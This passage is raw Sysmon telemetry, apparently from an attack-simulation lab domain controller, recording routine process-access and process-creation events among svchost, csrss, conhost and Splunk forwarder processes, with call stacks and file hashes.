L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3501-000000009101}3192C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.604{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EB-5FCF-3501-000000009101}3192C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.616{10ACEC4A-85EB-5FCF-3501-000000009101}3192C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.557{10ACEC4A-85EB-5FCF-3401-000000009101}33601844C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3401-000000009101}3360C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EB-5FCF-3401-000000009101}3360C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-85EB-5FCF-3301-000000009101}10084776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85EB-5FCF-3401-000000009101}3360C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.331{10ACEC4A-85EB-5FCF-3401-000000009101}3360C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EB-5FCF-3301-000000009101}1008C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000007378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EB-5FCF-3301-000000009101}1008C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:55.323{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 